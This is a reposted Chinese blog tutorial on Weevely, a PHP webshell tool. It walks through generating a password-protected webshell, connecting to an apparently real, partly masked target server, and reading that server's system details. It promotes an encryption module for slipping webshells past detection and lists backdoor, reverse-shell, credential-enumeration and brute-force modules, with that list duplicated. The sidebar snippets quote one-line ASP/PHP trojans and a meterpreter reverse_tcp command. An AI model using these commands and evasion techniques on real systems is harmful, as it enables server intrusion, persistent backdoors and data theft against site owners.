Weevely linux中的中国菜刀(转)

最新推荐文章于 2022-08-16 18:46:54 发布
最新推荐文章于 2022-08-16 18:46:54 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: 渗透测试工具 文章标签: linux菜刀

转载:
http://www.cnblogs.com/demonspider/archive/2013/04/05/3001139.html

weevely 是BT5中一个常用的webshell后门连接工具,它发挥的作用类似于中国菜刀(chopper)。

root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php

// 生成一个密码为 ices 的php webshell.

root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices

// ./weevely.py http://*.com/webshell.php [password] 连接

apache@HQEBWEBJ:/app/ecccs/web/common$ :system.info

// 按两下 tab键,进入操控模式,例如输入 system.info 获得系统信息

whoami: apache

hostname: HQEBWEBJ

basedir: /app/ecccs/web/common

uname: Linux HQEBWEBJ 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux

os: Linux

document_root: /home/ecccs/web

safe_mode: 0

script: /common/gen.php

client_ip: 120.3*.56.156

max_execution_time: 30

php_self: /common/gen.php

apache@HQEBWEBJ:/app/ecccs/web/common$ cat /etc/issue

Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel

// 执行一般的命令
加密功能

冷冷的夜提取了weevely的php加密模块 (其实这才是本文的亮点,用来免杀webshell)

$ python test.py 原.php 密.php

如下图,加密后的php一句话webshell代码中,只出现了str_replace这个熟知的函数,未出现其他关键字,这要查杀是非常难滴。

功能模块

系统 system.info //收集系统信息 文件 file.read //读文件 file.upload //上传本地文件 file.check //检查文件的权限和 file.enum //在本地词表的书面枚举远程文件 file.download //下载远程二进制/ ASCII文件到本地 SQL sql.query //执行SQL查询 sql.console //启动SQL控制台 sql.dump //获取SQL数据库转储 sql.summary //获取SQL数据库中的表和列 后门 backdoor.tcp //TCP端口后门 backdoor.install //安装后门 backdoor.reverse_tcp //反弹 枚举 audit.user_files //在用户家中列举常见的机密文件 audit.user_web_files //列举常见的Web文件 audit.etc_passwd //枚举/etc/passwd 查找 find.webdir //查找可写的web目录 find.perm //查找权限可读/写/可执行文件和目录 find.name //按名称查找文件和目录 find.suidsgid //查找SUID / SGID文件和目录 暴破 bruteforce.sql //暴力破解单一SQL用户 bruteforce.sql_users //暴力破解SQL密码 bruteforce.ftp // 暴力破解单一FTP用户 bruteforce.ftp_users //暴力破解FTP密码 系统 system.info //收集系统信息 文件 file.read //读文件 file.upload //上传本地文件 file.check //检查文件的权限和 file.enum //在本地词表的书面枚举远程文件 file.download //下载远程二进制/ ASCII文件到本地 SQL sql.query //执行SQL查询 sql.console //启动SQL控制台 sql.dump //获取SQL数据库转储 sql.summary //获取SQL数据库中的表和列 后门 backdoor.tcp //TCP端口后门 backdoor.install //安装后门 backdoor.reverse_tcp //反弹 枚举 audit.user_files //在用户家中列举常见的机密文件 audit.user_web_files //列举常见的Web文件 audit.etc_passwd //枚举/etc/passwd 查找 find.webdir //查找可写的web目录 find.perm //查找权限可读/写/可执行文件和目录 find.name //按名称查找文件和目录 find.suidsgid //查找SUID / SGID文件和目录 暴破 bruteforce.sql //暴力破解单一SQL用户 bruteforce.sql_users //暴力破解SQL密码 bruteforce.ftp // 暴力破解单一FTP用户 bruteforce.ftp_users //暴力破解FTP密码
weevely–linux中的菜刀

hackerie
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中国菜刀能在linux上运行吗,【Web Shell】- 技术剖析中国菜刀
weixin_29775447的博客
05-01 701
在第一部分,简单描述了中国菜刀的基本功能。本文我将剖析中国菜刀的平台多功能性、传输机制、交互模式和检测。我希望通过我的讲解,您能够根据您的环境检测出并清除它。平台那么中国菜刀可以在哪些平台上运行?答案是任何能够运行JSP、ASP、ASPX、PHP、CFM的Web服务器。这些是大多数Web应用程序语言。那么操作系统呢?中国菜刀足够灵活,可以在Windows和Linux上运行。这种操作系统和应用程序的...
linux菜刀使用教程,中国菜刀的使用教程
weixin_42514777的博客
05-05 1108
下载地址:x01介绍中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科菜刀的界面:1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)2019-9-26 17:...
2021Kali系列 -- linux菜刀(weevely3)
weixin_41489908的博客
04-19 2591
​人这辈子总是再等,等以后,等下次,等不忙,等有条件,等有时间,等有钱了,可是,后来呢。。。 ---- 网易云热评 简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为心,挂载远程文件系统,以目标为心的Bruteforce SQL帐户。 一、下载地址(软件作者) https://github.com/ep..
weevely基本使用
BeatRex的博客
11-22 8657
一、weevely使用 weevely的功能同之前学习过的中国菜刀,但其功能更加丰富且在linux和windows下都可以运行。kali linux环境下已集成weevely。分weevely生成shell文件、weevely连接后台、weevely信息探测、weevely文件操作、weevely审计这几块来学习。 以生成一个名为weevelyshell的shell并上传连接的案例进行学习。 首先...
中国菜刀能在linux上运行吗,中国菜刀的使用教程
weixin_39905624的博客
05-01 410
下载地址:x01介绍中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科菜刀的界面:1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)2019-9-26 17:...
kali新手上路代码.html
03-18
kali新手上路代码.html
菜刀的力学知识.doc
09-26
菜刀的力学知识】 菜刀是我们日常生活不可或缺的厨房工具,它的设计和使用涉及到许多物理学原理,尤其是力学知识。本研究旨在通过深入探讨菜刀的构造、种类、使用方式,以及背后的力学原理,帮助人们更好地...
培训linux靶机竞赛解题文档1
08-08
在网络安全竞赛Linux靶机挑战是常见的环节,它旨在测试参赛者对Linux系统安全、漏洞利用和渗透测试的理解。以下是对标题和描述涉及的知识点的详细解释: 1. **后台弱口令猜测**: 在网络安全,弱口令是一...
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
Linux下的菜刀weevely
qq_58000413的博客
08-16 355
backdoor_meterpreter -payload php/meterpreter/reverse_tcp -l host 本机ip -port 端口。命令:weevely generate -obfuscator cleartext1_php 例子:weevely http://192.168.3.248/shell.php shell。命令:weevely generate
kali中国菜刀weevely
司令2017的博客
04-17 2万+
weevely是一个kali集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行。     weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password 这是
linux 运行菜刀,linux 菜刀
weixin_34886431的博客
04-30 278
好像win下只能调用dll,既然你是用c/c++开发的库,那就应该尽可能的使用跨平台的api,win下发布为dll,linux下发布为so。就像汽车靠轮子走,轮船靠螺旋桨走是一个道理,虽然都是发动机带动。so是linux下编译的库文件而dll是win平台的是不是win上面安装了EcgAnalysis,linux上面没有安装EcgAnalysis类?你可以去看一些跨平台的解决方案,例如Eclipse...
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
热门推荐
小水池
07-27 2万+
本质 : windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> php一句话木马: <?php @eval($_POS
linux菜刀Weevely(php菜刀)工具使用超详解
qq_45300786的博客
12-06 751
weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。 项目地址:https://github.com/epinna/Weevely -后门生成&连接 测试系统:kali linux 5.3.0 amd64 环境:kali linux 自带apache+p
Weevely使用及源码分析(一)
fly小灰灰的专栏
01-30 2512
1. 简介 1.1 前言    weevely 是一款使用python编写的webshell工具(集webshell生成和连接于一身),采用C/S模式构建,可以算作是linux下的一款菜刀替代工具(限于PHP),具有很好的隐蔽性,在Linux下具有: 服务器配置审计 后门放置 暴力破解 文件管理 资源搜索 网络代理 命令执行 系统信息收集 端口扫描等功能 1.2 测试环境
Weevely工具使用详解 (Linux菜刀
weixin_45116657的博客
04-10 2667
一、下载与安装 下载地址:https://github.com/epinna/weevely3 下载之后解压,使用里面的weevely.py 在kali中国 ...
菜刀渗透提权小结
weixin_34174105的博客
04-24 1699
因为某原因搞某个站。主站搞不动,只能从二级域名下手,二级域名大多也不好搞,but,发现其一个站上有其他不少旁站,于是从旁站下手。拿shell无亮点,一笔带过吧,上传,bingo~提权过程得到点心得和经验,重点分享下:Shell允许跨目录,看了下权限,network service:因为数据库是sqlserver,故想尝试找到数据库连接串,用sa来提,but:用其他库的库用户登录可以成功,能够读库...
靶机SickOs1.2练习:上传马文件菜刀连接/反弹shell,进行本地提权
7Riven's blog
01-13 1424
1.主机发现 2.信息扫描 指纹信息 3.端口访问 该页面未发现有效信息 尝试ssh弱口令连接,密码为root,直接提权成功! 4.目录扫描 未发现有效路径 有一个test目录,访问看看 点击文件,未发现有用信息 方法一:可以尝试抓包,修改option为put,上传马文件,菜刀连接getshell 上传成功! 菜刀连接 ...
buuctf菜刀666
最新发布
09-26
buf菜刀666是一个用于网络安全竞赛的题目。根据引用的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要找到解压密码,可以在数据流寻找或者进行爆破。请注意,解压密码可能以password的方式出现在数据流

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值